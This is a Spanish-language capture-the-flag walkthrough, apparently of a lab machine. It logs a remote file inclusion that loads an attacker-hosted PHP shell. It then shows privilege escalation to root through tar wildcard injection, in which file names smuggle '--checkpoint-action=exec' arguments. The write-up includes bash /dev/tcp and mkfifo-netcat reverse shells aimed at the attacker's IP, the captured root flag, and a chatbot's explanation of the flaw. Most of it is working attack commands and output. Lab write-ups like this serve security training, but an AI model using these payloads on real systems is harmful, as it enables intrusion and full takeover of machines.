/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/default/ui.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/default/content.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/default/dialog.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/highcontrast
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/highcontrast/ui.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/highcontrast/content.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/skins/highcontrast/dialog.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/source_editor.htm
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/shortcuts.htm
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/langs
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/langs/en.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/langs/en_dlg.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/charmap.htm
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/anchor.htm
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/advanced/about.htm
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/img
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/img/icons.gif
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/editor_template_src.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/editor_template.js
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins/o2k7
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins/o2k7/img
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins/o2k7/img/button_bg.png
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins/o2k7/ui.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins/o2k7/content.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins/default
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins/default/ui.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/skins/default/content.css
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/langs
/var/www/html/45kra24zxs28v3yd/administrator/js/tiny_mce/themes/simple/langs/en.js
/var/www/html/45kra24zxs28v3yd/administrator/js/jquery.js
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/uploadify.php
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/uploadify.css
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/jquery.uploadify.js
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/cancel.png
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/expressInstall.swf
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/jquery.js
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/check.php
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/uploadify.swf
/var/www/html/45kra24zxs28v3yd/administrator/js/uploadify/swfobject.js
/var/www/html/45kra24zxs28v3yd/administrator/js/swfobject.js
/var/www/html/45kra24zxs28v3yd/administrator/classes
/var/www/html/45kra24zxs28v3yd/administrator/classes/DataBase.php
/var/www/html/45kra24zxs28v3yd/administrator/classes/Security.php
////////////////// RECONECTAMOS Y CONTINUAMOS LA MAQUINA DESDED DONDE DEJAMOS ///////
http://10.10.131.229/45kra24zxs28v3yd/administrator/
http://10.10.131.229/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.241.89:8080/shellpaimon.php
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
ls
alertConfigField.php
alertIFrame.php
alertImage.php
defaultAlert.php
pwd
/var/www/html/45kra24zxs28v3yd/administrator/alerts
env
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html/45kra24zxs28v3yd/administrator/alerts
env | grep PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
VEMOS LA VERSION DE KERNEL; SISTEMA Y COMPILADOR:
cat /proc/version
Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
cat /etc/issue
Ubuntu 16.04.6 LTS \n \l
VEMOS DENTRO DEL ARCHIVO BACKUP.SH :
cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
CREAMOS NUESTRO PAYLOAD PARA SER EJECUTADO POR ROOT EN LAS CRON HOBS Y ESCALAR LOS PRIVILEGIOS A LA ESCUCHA CON NETCAT:
#!/bin/bash
bash -i >& /dev/tcp/10.10.241.89/4445 0>&1
LO AGREGAMOS AL ARCHIVO NUESTRA REVERSE SHELL BACKUP.SH PERO EN EL DIRECTORIO DE MILES NO NOS DEJA , ASI QUE LO AGRAGAMOS POR AHORA EN EL DIRECTORIO QUE APUNTA EL BACKUP.SH ORIGINAL /var/www/html el cual sera comprimido con TAR :
echo '#!/bin/bash' > backup.sh && echo 'bash -i >& /dev/tcp/10.10.241.89/4445 0>&1' >> backup.sh
echo '#!/bin/bash' >> ~/.bash_history && echo 'bash -i >& /dev/tcp/10.10.241.89/4445 0>&1' >> ~/.bash_history
export PATH=/ejemplo:$PATH
NO FUNCIONO NINGUN METODO HASTA AHORA, NI LOS DE 4 WRITUPS QUE VIMOS LUEGO.....!!!!!
--------------- PROBAMOS OTRO METODO APROBECHANDO DE CRONTABS EJECUTADAS POR ROOT DEL ARCHIVO BACKUP.SH Y APROBECHANDO TAMBIEN UNA VULNERABILIDAD EN COMO "TAR" AL COMPRIMIR TARATA MAL A LOS NOMBRES ESPECIALES DE LOS ARCHIVOS QUE VAMOS ACREAR CON UNA SHELL REVERSA QUE ESCUCHAREMOS CON NUESTRO NETCAT Y RECIBIREMOS UNA SHELL DE ROOT POR QUIEN ES EJECUTADA ESTA TAREA CRONHOBS PRINCIPAL :
EN EL DIRECTORIO VAR/www/html CREAMOS ESTE ARCHIVO SHELL.SH:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.241.89 4445 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
ESCUCHAMOS MIENTRAS CON NETCAT Y BINGO AL FIN SE TENZO CONSEGUIMOS ROOT Y SU BANDERA::
┌──(root㉿kali)-[~]
└─# nc -lnvp 4445
listening on [any] 4445 ...
connect to [10.10.241.89] from (UNKNOWN) [10.10.68.112] 50760
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# pwd
/var/www/html
# cd /root
# ls
root.txt
# cat root.txt
3f0372db24753accc7179a282cd6a949
# id
uid=0(root) gid=0(root) groups=0(root)
EXPLICACION DE LA VULNERABILIDAD SEGUN YO Y GPT:
mira ahi unas crontab ejecutadas por root, que apuntan a ejecutar este archivo con su contenidio: cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz * . y si vemos este script .sh se va al directorio cd /var/www/html y usa tar para comprimir todo lo que hay en el, sera aqui la bulnerabilidad por parte de como trata tar los nombres especiales e los archivos que creamos antes al comprimirlos y en realidad por esta vulnerabilidad los termina ejecutando como root dandome la shell indirectamente como root en mi netcat ?
ChatGPT
Sí, parece que has identificado correctamente la posible vulnerabilidad en el script backup.sh que se ejecuta a través de las crontabs como root. Vamos a analizarlo en detalle:
bash
Copy code
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz * .
Aquí se explica lo que hace el script:
Cambia al directorio /var/www/html.
Utiliza el comando tar para crear un archivo backup.tgz en el directorio /home/milesdyson/backups.
tar cf /home/milesdyson/backups/backup.tgz * . indica que se debe incluir todo (*) en el directorio actual (.) en el archivo backup.tgz.
Ahora, si recordamos los archivos que creaste anteriormente:
/var/www/html/--checkpoint-action=exec=sh shell.sh
/var/www/html/--checkpoint=1
Parece que podrías aprovechar la vulnerabilidad en la forma en que tar maneja los nombres de archivos especiales. Si el script de copia de seguridad (backup.sh) es ejecutado por root, y tar interpreta de manera incorrecta los nombres de archivos especiales, podrías lograr la ejecución de comandos arbitrarios en el contexto de root.
Esto podría ser un caso de inyección de comandos a través de nombres de archivos maliciosos que son interpretados por tar de manera incorrecta. Será necesario realizar pruebas adicionales para confirmar la explotación de esta vulnerabilidad específica.
Last updated